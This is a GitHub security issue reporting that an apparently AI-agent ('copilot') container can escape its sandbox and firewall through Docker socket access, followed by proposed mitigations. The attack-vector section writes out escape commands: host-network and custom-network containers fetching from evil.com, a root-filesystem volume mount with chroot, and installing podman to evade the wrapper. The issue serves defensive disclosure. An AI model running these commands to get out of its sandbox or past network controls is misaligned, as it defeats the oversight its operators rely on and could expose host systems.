Skip to content

[Security] Docker socket access allows container escape and firewall bypass #10

Closed
#205
Closed
[Security] Docker socket access allows container escape and firewall bypass#10
#205
Labels
bugSomething isn't workingenhancementNew feature or request
@Mossaka

Description

@Mossaka
Mossaka
opened on Oct 24, 2025

Priority

Critical

Description

The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.

Attack vectors

1. Bypass docker-wrapper directly

/usr/bin/docker-real run --network host alpine wget https://evil.com

2. Create custom network

docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com

3. Volume mount escape

docker run -v /:/host alpine chroot /host bash

4. Alternative container runtimes

apt-get install podman
podman run --network host alpine wget https://evil.com

Current mitigations (insufficient)

  • docker-wrapper.sh intercepts docker command but is easily bypassed
  • Host-level iptables only filter awf-net bridge, not custom networks
  • Wrapper blocks --privileged, --network host, --add-host but can be bypassed

Code locations

  • src/docker-manager.ts:223-224 - Docker socket mount
  • containers/copilot/docker-wrapper.sh - Wrapper script (bypassable)
  • containers/copilot/Dockerfile:34-35 - Symlink setup

Proposed solutions

Option A: Remove Docker socket access (breaking change)

  • Pros: Simplest, most secure
  • Cons: Breaks MCP servers that need Docker (Playwright, etc.)
  • Implementation: Remove socket mount, document that users must spawn Docker-based MCPs outside firewall

Option B: Use docker-socket-proxy

  • Pros: Restricts Docker API calls, maintains auto-spawn functionality
  • Cons: Adds complexity, still allows network creation
  • Implementation: Add docker-socket-proxy container, configure to block dangerous operations
  • Reference: https://github.com/Tecnativa/docker-socket-proxy

Option C: Enforce awf-net for all networks (host-level)

  • Pros: Prevents custom network bypass
  • Cons: Complex iptables rules, doesn't prevent volume escapes
  • Implementation: Add iptables rules to block/filter all Docker networks except awf-net

Option D: AppArmor/SELinux profiles

  • Pros: Fine-grained control
  • Cons: Very complex, platform-specific
  • Implementation: Docker security profiles restricting socket operations

Recommendation

Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't workingenhancementNew feature or request

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions